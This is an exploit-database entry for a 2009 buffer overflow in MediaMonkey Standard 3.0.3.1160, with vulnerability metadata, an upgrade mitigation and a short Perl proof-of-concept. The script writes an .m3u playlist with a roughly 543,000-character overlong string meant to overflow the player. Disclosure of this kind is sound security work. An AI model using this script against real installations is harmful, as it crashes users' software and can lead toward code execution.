header-logo
Suggest Exploit
vendor:
MediaMonkey Standard
by:
ALpHaNiX
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: MediaMonkey Standard
Affected Version From: 3.0.3.1160
Affected Version To: 3.0.3.1160
Patch Exists: YES
Related CWE: N/A
CPE: a:ventis_media:mediamonkey_standard
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

MediaMonkey Standard 3.0.3.1160 Buffer Overflow

A buffer overflow vulnerability exists in MediaMonkey Standard 3.0.3.1160. A specially crafted .m3u file can cause a buffer overflow when opened in MediaMonkey, resulting in arbitrary code execution. This vulnerability is due to a boundary error when handling overly long strings in the .m3u file. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of MediaMonkey Standard.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# By ALpHaNiX
# NullArea.Net
# THanks
#can get the software from
http://www.download.com/MediaMonkey-Standard/3000-2141_4-10109807.html

my $file = "alpix.m3u" ;
print "[+] Exploiting....." ;
my $buff1="http://"."A" x 543339 ;
open(m3u, ">>$file") or die "Cannot open $file";
print m3u $buff1;
close(m3u);
print "\n[+] done !";

# milw0rm.com [2009-01-25]

Navigation

Suggest Exploit

Services By CQR